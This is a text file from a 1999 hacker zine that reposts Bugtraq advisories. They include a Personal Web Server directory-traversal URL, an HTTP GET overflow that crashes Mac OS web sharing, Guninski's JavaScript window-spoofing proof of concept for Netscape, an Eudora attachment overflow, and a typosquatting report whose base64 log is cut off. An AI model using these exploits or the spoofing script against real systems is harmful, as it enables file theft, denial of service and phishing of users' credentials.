home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Midnight-Raid / midnightRAID_iss4.docmaker.sit / midnightRAID_iss4.docmaker.rsrc / TEXT_146.txt < prev    next >
Text File  |  1999-03-25  |  28KB  |  512 lines

  1. more ripped from bugtraq goodiez, this onez GOOD tho :)
  2.  
  3. While playing with Microsoft Personal Web Server
  4. (Frontpage-PWS32/3.0.2.926).
  5. I found that the following URL will list the root directory and be able to
  6. download any file you want.
  7. http://www.victim.com/....../
  8.  
  9. Index of /....../
  10.  
  11.   WINDOWS
  12.   My Documents
  13.   Program Files
  14.   FrontPage Webs
  15.   AUTOEXEC.BAT
  16.   COMMAND.COM
  17.  
  18. and so on.......
  19.  
  20.  
  21.  
  22. the bugtraq ripper strikes again!*(^!#(* yay!
  23.  
  24. Sending...
  25.  
  26. GET aaaaa[...x4000...]aaaaa HTTP/1.0
  27.  
  28. [followed by pressing return twice]
  29.  
  30. to port 80 on an Apple Mac, MacOS 8.5.1, with web sharing enabled makes it
  31. change from "Web Sharing On" to "Web Sharing Off", presumably because the web
  32. server task dies.  An annoying DoS, possibly worse, who knows (depends if
  33. they compiled with range checking on, what language they used, etc).
  34.  
  35. -David. 
  36.  
  37.  
  38. Netscape Communicator window spoofing bug
  39.  
  40. There is a bug in Netscape Communicator 3.04,4.06,4.5 Win95 and 4.08
  41. WinNT, which allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. It needs Javascript enabled.
  42.  
  43. Workaround: Disable Javascript
  44.  
  45. Demonstration is available at:
  46.  http://www.nat.bg/~joro/b14.html
  47.  http://www.whitehats.com/guninski/b14.html
  48.  
  49. This bug is different from the "frame spoofing vulnerability"
  50.  
  51. The code is:
  52. -------------------------------
  53. function doit()
  54. {
  55.  
  56. a.document.open();
  57. a.document.write("<H1>Look at the location bar!<BR>");
  58. a.document.write("<A HREF='http://www.whitehats.com/guninski'>Go to
  59. Georgi Guninski's home page</A></H1>");
  60. a.document.close();
  61. }
  62.  
  63. function winopen() {
  64. a=window.open("view-source:javascript:location='http://www.yahoo.com';");
  65. setTimeout('doit()',30000);
  66. }
  67.  
  68. </SCRIPT>
  69.  
  70. <A HREF="javascript:void(0)" onclick="winopen()"
  71. onMouseOver="window.status='http://www.yahoo.com';return true">
  72. Follow this link to go to www.yahoo.com (or somewhere else)
  73. </A>
  74. -------------------------------
  75. Note: My web page has moved. Look below for the new URLs.
  76.  
  77. Regards,
  78. Georgi Guninski
  79. http://www.nat.bg/~joro
  80. http://www.whitehats.com/guninski
  81.  
  82. Eudora Attachment Buffer Overflow
  83.  
  84. I have found another problem with Eudora, attachments, and long filenames that
  85. is similar to the the problem I found last year.
  86.  
  87. If two messages are sent to an Eudora 4.1 user that have an attachment with a
  88. filename of around 231 or more, the next time the user checkes his mail Eudora
  89. crashes.  I say 231 because C:\Program Files\Eudora\Attach\ is 31 characters +
  90. 231 = 262 = longer then Windows can handle.
  91.  
  92. Eudora trucates the long filename correctly and thats why you cant't send just
  93. one messages with a long name, like you use to be able to do with Eudora 4.0.
  94. But it truncates it so the the path length is 259 characters which is the
  95. maximum.  Then when it receives the second attachment it truncates, and trys to
  96. add a 1 to the end, this is where it crashes.  This allows you to modify the
  97. return address to point to arbitrary code.
  98.  
  99. Here is how i tested:
  100. Send message to myself with attchment that has a long filename
  101. Resend exact message
  102. Check my mail
  103. Eudora crashes
  104.  
  105. Both the Win 95 and Win NT versions, along with the 4.2 beta of Eudora are
  106. affected.
  107.  
  108. The vendor of Eudora, Qualcomm was notified of this problem on 3/12/99.
  109.  
  110.  
  111.  
  112. Rainbow Six Buffer Overflow.....
  113.  
  114. Brian Gemberling (camaro@ex-pressnet.com)
  115. Thu, 11 Feb 1999 17:37:43 -0500
  116.  
  117.    * Messages sorted by: [ date ][ thread ][ subject ][ author ]
  118.    * Next message: Ken Williams: "Pro/wuFTPD DoS (Was: Re: SECURITY: new
  119.      wu-ftpd packages available"
  120.    * Previous message: Casper Dik: "Re: SSH 1.x and 2.x Daemon"
  121.  
  122.         Rainbow Six Multiplayer can be crashed with a buffer overflow just like quake2...
  123.  
  124. If someone makes the Nick something like...
  125.  
  126. R700@#!@#@!KRDKJRKDJRKJELJAKRLEALJRHKJEHREKHLARNMBE$MNB#L$K#H$&YUFHOPSUYD)**ASD*&S&A*)(E&(*&@#*(&@(*&#J#@JKH#...
  127.  
  128. you get the idea...Boom goes mr. server.
  129.  
  130. Just thought I'd pass it on..
  131.  
  132.    * Next message: Ken Williams: "Pro/wuFTPD DoS (Was: Re: SECURITY: new
  133.      wu-ftpd packages available"
  134.    * Previous message: Casper Dik: "Re: SSH 1.x and 2.x Daemon"
  135.  
  136.  
  137. Spoofed Yahoo web site - www.yaho.co.uk
  138.  
  139. Paul Murphy (Paul.Murphy@GEMINI-RESEARCH.CO.UK)
  140. Mon, 8 Feb 1999 19:14:27 +0000
  141.  
  142.    * Messages sorted by: [ date ][ thread ][ subject ][ author ]
  143.    * Next message: Michael: "FakeBo 0.3.1 & nmap"
  144.    * Previous message: David LeBlanc: "Re: ISS Internet Scanner Cannot be
  145.      relied upon for conclusive"
  146.    * Next in thread: Paul McGovern: "Re: Spoofed Yahoo web site -
  147.      www.yaho.co.uk"
  148.  
  149. This is a MIME message. If you are reading this text, you may want to
  150. consider changing to a mail reader or gateway that understands how to
  151. properly handle MIME multipart messages.
  152.  
  153. --=_5A0DDE8C.57365AD0
  154. Content-Type: text/plain; charset=US-ASCII
  155. Content-Disposition: inline
  156.  
  157. Hi,
  158.  
  159. You might like to try this one on for size, and advise whether there's
  160. anything nasty going on behind this site.....
  161.  
  162. One of our users mistyped the URL of the Yahoo portal site in the UK,
  163. and instead of the normal site, he got a graphic saying "Oops - looks
  164. like a typo".  After a few seconds, he found the normal Yahoo site, and
  165. assumed all was well.
  166.  
  167. All of our Internet access is forced through a local proxy server, and
  168. our logs are scanned for anything naughty, so I was surprised to
  169. discover the attached log entries, which after verification, I can show
  170. is the correct result when accessing "www.yaho.co.uk".
  171.  
  172. It appears that this does a silent redirect to the correct site, but
  173. with a lot of funny stuff going on in the meantime, some of it on what
  174. appear to be proxy server ports.
  175.  
  176. The obvious concern is that users will not notice the redirect, use the
  177. search to go to Amazon or some other online shop, enter their credit
  178. card details with the standard 40 bit encryption, and feel safe.
  179. Meanwhile, someone else also has the whole session, does a brute force
  180. attack against the session key, and within hours has the credit card
  181. details....
  182.  
  183. Am I just being paranoid, or is this for real?  The access to
  184. "www.nutzwerk.de"
  185. at 18:16:37 in particular seems significant, since this would be a nice
  186. way to track who is being led astray, and how successful your ploy had
  187. been....
  188.  
  189. Paul.
  190.  
  191. -----------------------------------------------------------------------------
  192. Paul Murphy - Head of I.T., Gemini Research Ltd
  193. 162 Science Park, Cambridge CB4 4GH
  194. Tel. 01223 435305 Fax. 01223 435301
  195. http://www.gemini-research.co.uk/
  196.  
  197. --=_5A0DDE8C.57365AD0
  198. Content-Type: application/octet-stream; name="yahoo.log"
  199. Content-Transfer-Encoding: base64
  200. Content-Disposition: attachment; filename="yahoo.log"
  201.  
  202. c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjoxNiAr
  203. MDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG8uY28udWsvIEhUVFAvMS4wIiAyMDAgNjA0DQpzdXBw
  204. b3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjE5ICswMDAw
  205. XSAiR0VUIGh0dHA6Ly93d3cuYWx0YXZpc3RhLmNvbS9hdi9naWZzL2RhcnQuZ2lmIEhUVFAvMS4w
  206. IiAyMDAgMjY2DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5
  207. OjE4OjE2OjE5ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYWx0YXZpc3RhLmNvbS9hdi9naWZzL2dy
  208. YXlkb3QuZ2lmIEhUVFAvMS4wIiAyMDAgODYNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVr
  209. IC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MjIgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5udXR6d2Vy
  210. ay5kZS90eXBvLmh0bWwgSFRUUC8xLjAiIDIwMCAxODMyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj
  211. aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjIzICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu
  212. eGFob28uY29tL29vb3BzMi5naWYgSFRUUC8xLjAiIDIwMCAyNzg4DQpzdXBwb3J0LmdlbWluaS1y
  213. ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjI4ICswMDAwXSAiR0VUIGh0dHA6
  214. Ly93d3cudHliby5uZXQvbG9hZHdhcnMuaHRtbCBIVFRQLzEuMCIgMjAwIDQyNQ0Kc3VwcG9ydC5n
  215. ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjoyOSArMDAwMF0gIkdF
  216. VCBodHRwOi8vd3d3LnR5Ym8ubmV0L3N0YXJ3YXJzLmpzIEhUVFAvMS4wIiAyMDAgNTc2NQ0Kc3Vw
  217. cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozMCArMDAw
  218. MF0gIkdFVCBodHRwOi8vd3d3LnR5Ym8ubmV0L2Vncm91cHMuaHRtbCBIVFRQLzEuMCIgMjAwIDE4
  219. NjkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6
  220. MzAgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5hYWUubmV0L3R5Ym8vZGlzbmV5Lmh0bWwgSFRUUC8x
  221. LjAiIDIwMCAyMTE0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x
  222. OTk5OjE4OjE2OjMxICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29tL2dhbWVzdGFy
  223. dC5odG0gSFRUUC8xLjAiIDIwMCAzNTAyDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAt
  224. IC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjMxICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXgu
  225. Y29tL2hvbWUuaHRtIEhUVFAvMS4wIiAyMDAgOTY3DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j
  226. by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjMyICswMDAwXSAiR0VUIGh0dHA6Ly93d3cudHli
  227. by5uZXQvYmxhbmsuaHRtbCBIVFRQLzEuMCIgMjAwIDExMQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFy
  228. Y2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozNSArMDAwMF0gIkdFVCBodHRwOi8vd3d3
  229. LmxvdHRvc2V4LmNvbS9ob21lLmpzIEhUVFAvMS4wIiAyMDAgMzkzNw0Kc3VwcG9ydC5nZW1pbmkt
  230. cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjozNSArMDAwMF0gIkdFVCBodHRw
  231. Oi8vd3d3LmxvdHRvc2V4LmNvbS9zdGF0dXNleC5qcyBIVFRQLzEuMCIgMjAwIDQzMjANCnN1cHBv
  232. cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MzYgKzAwMDBd
  233. ICJHRVQgaHR0cDovL3d3dy50eWJvLm5ldC9zdGF0dXNleC5qcyBIVFRQLzEuMCIgMjAwIDM0NjgN
  234. CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6MzYg
  235. KzAwMDBdICJHRVQgaHR0cDovL3d3dy5hYWUubmV0L3R5Ym8vbnN0YXR1cy5qcyBIVFRQLzEuMCIg
  236. MjAwIDIwMjkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6
  237. MTg6MTY6MzcgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5udXR6d2Vyay5kZS9jZ2ktYmluL25ld2Nv
  238. dW50P251dHp3MzAxJndpZHRoPTUmZm9udD1kaWdpdGFsIEhUVFAvMS4wIiAyMDAgMTg2DQpzdXBw
  239. b3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE2OjQxICswMDAw
  240. XSAiR0VUIGh0dHA6Ly93d3cueWFob28uY29tLyBIVFRQLzEuMCIgMjAwIDQ4NTYNCnN1cHBvcnQu
  241. Z2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6NDEgKzAwMDBdICJH
  242. RVQgaHR0cDovL3d3dy55YWhvby5jby51ay8gSFRUUC8xLjAiIDIwMCAxNDA3Nw0Kc3VwcG9ydC5n
  243. ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1NSArMDAwMF0gIkdF
  244. VCBodHRwOi8vd3d3LnR5Ym8ubmV0L3dlbGNvbWUuZ2lmIEhUVFAvMS4wIiAyMDAgNzY4OQ0Kc3Vw
  245. cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1NiArMDAw
  246. MF0gIkdFVCBodHRwOi8vd3d3LmxvdHRvc2V4LmNvbS9ibGFuay5odG0gSFRUUC8xLjAiIDIwMCAx
  247. NDkNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTY6
  248. NTcgKzAwMDBdICJHRVQgaHR0cDovL3d3dy55YWhvby5jby51ay9pbWFnZXMvc20uZ2lmIEhUVFAv
  249. MS4wIiAyMDAgMzU3DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x
  250. OTk5OjE4OjE2OjU3ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYWFlLm5ldC90eWJvL29vb3BzMi5n
  251. aWYgSFRUUC8xLjAiIDIwMCAyNzg4DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
  252. WzA4L0ZlYi8xOTk5OjE4OjE2OjU3ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29t
  253. L3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u
  254. dWsgLSAtIFswOC9GZWIvMTk5OToxODoxNjo1OCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmxvdHRv
  255. c2V4LmNvbS9zdGFydC5odG0gSFRUUC8xLjAiIDIwMCAzOTA3DQpzdXBwb3J0LmdlbWluaS1yZXNl
  256. YXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjAxICswMDAwXSAiR0VUIGh0dHA6Ly9h
  257. ZHVsdGFkLmhvdGx5bnh4eC5jb20vaG90YXBpLndzYS9HSUYxOTU1IEhUVFAvMS4wIiAzMDIgMA0K
  258. c3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzowNCAr
  259. MDAwMF0gIkdFVCBodHRwOi8vd3d3LmJhbm5lcmJyb2tlcnMuY29tL2ltYWdlcy9hZF9pbmZvLmdp
  260. ZiBIVFRQLzEuMCIgMjAwIDc5OQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFsw
  261. OC9GZWIvMTk5OToxODoxNzowNSArMDAwMF0gIkdFVCBodHRwOi8vaW1hZ2UuY2xpY2sybmV0LmNv
  262. bS8/QTAwMDI0MSw2IEhUVFAvMS4wIiAzMDIgMjM4DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j
  263. by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cubG90
  264. dG9zZXguY29tL2Jhbm5lci9rYXJhLmpwZyBIVFRQLzEuMCIgMjAwIDE3NzkwDQpzdXBwb3J0Lmdl
  265. bWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA2ICswMDAwXSAiR0VU
  266. IGh0dHA6Ly93d3cueWFob28uY28udWsvYWR2L2ltYWdlcy95Y2xpY2tfd29yazJfaG1wZ191ay5n
  267. aWYgSFRUUC8xLjAiIDIwMCAzMDY1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0g
  268. WzA4L0ZlYi8xOTk5OjE4OjE3OjA3ICswMDAwXSAiR0VUIGh0dHA6Ly8yMDkuOTAuMTI4LjU1L2Ns
  269. aWNrMi9hZF9iaW4vY2FtcGFpZ25zL2h0bDJfcG9ydC5naWYgSFRUUC8xLjAiIDIwMCAzNDQwDQpz
  270. dXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA4ICsw
  271. MDAwXSAiR0VUIGh0dHA6Ly93d3cuZWFkcy5jb20vYWRzZXJ2ZS9hZHNlcnZlLmRsbC9iYW5uZXI/
  272. R0ExMDM0NywwLDAgSFRUUC8xLjAiIDIwMCA1Njg1DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5j
  273. by51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjA4ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cuYmFu
  274. bmVyYnJva2Vycy5jb20vY2dpLWJpbi9iYW5uZXIuY2dpP3Byb2ZpbGUxJndvbm5lMTUgSFRUUC8x
  275. LjAiIDIwMCAxMTQ4NA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIv
  276. MTk5OToxODoxNzowOSArMDAwMF0gIkdFVCBodHRwOi8vd3d3LnlhaG9vLmNvLnVrL2ltYWdlcy91
  277. a19tYWluNGMuZ2lmIEhUVFAvMS4wIiAyMDAgNjQ0MA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2gu
  278. Y28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzoxNCArMDAwMF0gIkdFVCBodHRwOi8vYWRzZXJ2
  279. ZS5iYW5uZXJwb29sLmNvbS9jZ2ktYmluL3Nob3diYW5uZXI/TjAwMDAwNTQ4MyBIVFRQLzEuMCIg
  280. MjAwIDMyNjYNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6
  281. MTg6MTc6MTUgKzAwMDBdICJHRVQgaHR0cDovLzIwNy4xNTEuMTguMTc3L2Jhbm5lcnMvaGxuL2Ns
  282. aWVudHMvcGJhbjNfdjMuZ2lmIEhUVFAvMS4wIiAyMDAgMTQ4MDANCnN1cHBvcnQuZ2VtaW5pLXJl
  283. c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MTkgKzAwMDBdICJHRVQgaHR0cDov
  284. L3d3dy5sb3R0b3NleC5jb20vYmFubmVyL21hY2hpbmUuZ2lmIEhUVFAvMS4wIiAyMDAgMTczNzIN
  285. CnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MTkg
  286. KzAwMDBdICJHRVQgaHR0cDovL3d3dy5sb3R0b3NleC5jb20vSExOYnV0dG9uLmdpZiBIVFRQLzEu
  287. MCIgMjAwIDEzMTQwDQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8x
  288. OTk5OjE4OjE3OjMwICswMDAwXSAiR0VUIGh0dHA6Ly93aXAuZG91YmxlY2xpY2submV0L3ZpZXdh
  289. ZC8zMjg0LVNsaWRlcjEyNXgxMjVfU3BlZWRfQW5uLmdpZiBIVFRQLzEuMCIgNTAwIDgzNg0Kc3Vw
  290. cG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozMCArMDAw
  291. MF0gIkdFVCBodHRwOi8vd2lwLmRvdWJsZWNsaWNrLm5ldC92aWV3YWQvMjcxMDQtMTIweDYwU2hv
  292. cFByb21vNC5HSUYgSFRUUC8xLjAiIDUwMCA4MjQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNv
  293. LnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzQgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5sb3R0
  294. b3NleC5jb20vc3RhdHVzZXguanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1yZXNl
  295. YXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM0ICswMDAwXSAiR0VUIGh0dHA6Ly93
  296. d3cudHliby5uZXQvc3RhdHVzZXguanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWluaS1y
  297. ZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM0ICswMDAwXSAiR0VUIGh0dHA6
  298. Ly93d3cubG90dG9zZXguY29tL2hvbWUuanMgSFRUUC8xLjAiIDMwNCAtDQpzdXBwb3J0LmdlbWlu
  299. aS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICswMDAwXSAiR0VUIGh0
  300. dHA6Ly93d3cudHliby5uZXQvZG93bmxvYWQuaHRtbCBIVFRQLzEuMCIgMjAwIDE2MDMNCnN1cHBv
  301. cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzUgKzAwMDBd
  302. ICJHRVQgaHR0cDovL3d3dy5iYW5uZXJicm9rZXJzLmNvbS9jZ2ktYmluL2Jhbm5lci5jZ2k/cHJv
  303. ZmlsZTEmd29ubmUxNSBIVFRQLzEuMCIgMjAwIDExNDg0DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJj
  304. aC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICswMDAwXSAiR0VUIGh0dHA6Ly93d3cu
  305. bG90dG9zZXguY29tL2JsYW5rLmh0bSBIVFRQLzEuMCIgMzA0IC0NCnN1cHBvcnQuZ2VtaW5pLXJl
  306. c2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6MzUgKzAwMDBdICJHRVQgaHR0cDov
  307. L3d3dy5sb3R0b3NleC5jb20vc3RhcnQuaHRtIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5nZW1p
  308. bmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozNSArMDAwMF0gIkdFVCBo
  309. dHRwOi8vd3d3LnR5Ym8ubmV0L3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAzMDQgLQ0Kc3VwcG9ydC5n
  310. ZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzozNSArMDAwMF0gIkdF
  311. VCBodHRwOi8vd3d3LmFhZS5uZXQvdHliby9sb3R0by5odG1sIEhUVFAvMS4wIiAyMDAgNDYwDQpz
  312. dXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM1ICsw
  313. MDAwXSAiR0VUIGh0dHA6Ly93d3cubG90dG9zZXguY29tL3N0YXR1c2V4LmpzIEhUVFAvMS4wIiAz
  314. MDQgLQ0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODox
  315. NzozNyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmFhZS5uZXQvdHliby9sb3R0b25hdi5qcyBIVFRQ
  316. LzEuMCIgMjAwIDQ0MDMNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmVi
  317. LzE5OTk6MTg6MTc6MzggKzAwMDBdICJHRVQgaHR0cDovL3d3dy5zdGFyc2Fkcy5jb20vY2dpLWJp
  318. bi9zZXJ2ZS5jZ2k/SUQ9TnV0endlcmsgSFRUUC8xLjAiIDIwMCAyMjAwDQpzdXBwb3J0LmdlbWlu
  319. aS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4OjE3OjM4ICswMDAwXSAiUE9TVCBo
  320. dHRwOi8vYWRzZXJ2ZS5iYW5uZXJwb29sLmNvbS9jZ2ktYmluL2dvYmFubmVyP04wMDAwMDU0ODMg
  321. SFRUUC8xLjAiIDMwMiAxOTcNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgv
  322. RmViLzE5OTk6MTg6MTc6NDAgKzAwMDBdICJHRVQgaHR0cDovL2ltYWdlLmNsaWNrMm5ldC5jb20v
  323. P0EwMDM3ODQsMSBIVFRQLzEuMCIgMzAyIDIzNw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28u
  324. dWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0MyArMDAwMF0gIkdFVCBodHRwOi8vd3d3LmN5YmVy
  325. dGhyaWxsLmNvbS9jZ2ktYmluL3Nwb25zb3Ivc3RpL3JpY29jaGV0LmNnaT90eXBvPXlhaG9vLmRl
  326. IEhUVFAvMS4wIiAzMDIgMA0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
  327. ZWIvMTk5OToxODoxNzo0NCArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t
  328. OjgwODAvaW5kZXguc2h0bWw/VjgwMCBIVFRQLzEuMCIgMjAwIDYyNA0Kc3VwcG9ydC5nZW1pbmkt
  329. cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0NCArMDAwMF0gIkdFVCBodHRw
  330. Oi8vd3d3LmJhbm5lcmJyb2tlcnMuY29tL2NnaS1iaW4vYmFubmVyLmNnaT9wcm9maWxlMSZ3b25u
  331. ZTE1IEhUVFAvMS4wIiAyMDAgMTE0ODQNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0g
  332. LSBbMDgvRmViLzE5OTk6MTg6MTc6NDUgKzAwMDBdICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50
  333. YXN5LmNvbTo4MDgwL2N1cnRhaW4uc2h0bWw/VjgwMCBIVFRQLzEuMCIgMjAwIDE4OTUNCnN1cHBv
  334. cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NDUgKzAwMDBd
  335. ICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL21haW4uc2h0bWw/VjgwMCBI
  336. VFRQLzEuMCIgMjAwIDIwODcNCnN1cHBvcnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgv
  337. RmViLzE5OTk6MTg6MTc6NDUgKzAwMDBdICJHRVQgaHR0cDovLzIwOS45MC4xMjguNTUvY2xpY2sy
  338. L2FkX2Jpbi9jYW1wYWlnbnMvYzYtMzE2cC0uZ2lmIEhUVFAvMS4wIiAyMDAgMTEyNTENCnN1cHBv
  339. cnQuZ2VtaW5pLXJlc2VhcmNoLmNvLnVrIC0gLSBbMDgvRmViLzE5OTk6MTg6MTc6NDYgKzAwMDBd
  340. ICJHRVQgaHR0cDovL3d3dy5DYXNpbm9GYW50YXN5LmNvbTo4MDgwL2ltZy9nZXJtYW4uZ2lmIEhU
  341. VFAvMS4wIiAyMDAgMTA0Nw0Kc3VwcG9ydC5nZW1pbmktcmVzZWFyY2guY28udWsgLSAtIFswOC9G
  342. ZWIvMTk5OToxODoxNzo0NiArMDAwMF0gIkdFVCBodHRwOi8vd3d3LkNhc2lub0ZhbnRhc3kuY29t
  343. OjgwODAvaW1nL2VuZ2xpc2guZ2lmIEhUVFAvMS4wIiAyMDAgMTM3NA0Kc3VwcG9ydC5nZW1pbmkt
  344. cmVzZWFyY2guY28udWsgLSAtIFswOC9GZWIvMTk5OToxODoxNzo0NyArMDAwMF0gIkdFVCBodHRw
  345. Oi8vd3d3LkNhc2lub0ZhbnRhc3kuY29tOjgwODAvaW1nL2tvcmVhbi5naWYgSFRUUC8xLjAiIDIw
  346. MCAxNDc2DQpzdXBwb3J0LmdlbWluaS1yZXNlYXJjaC5jby51ayAtIC0gWzA4L0ZlYi8xOTk5OjE4
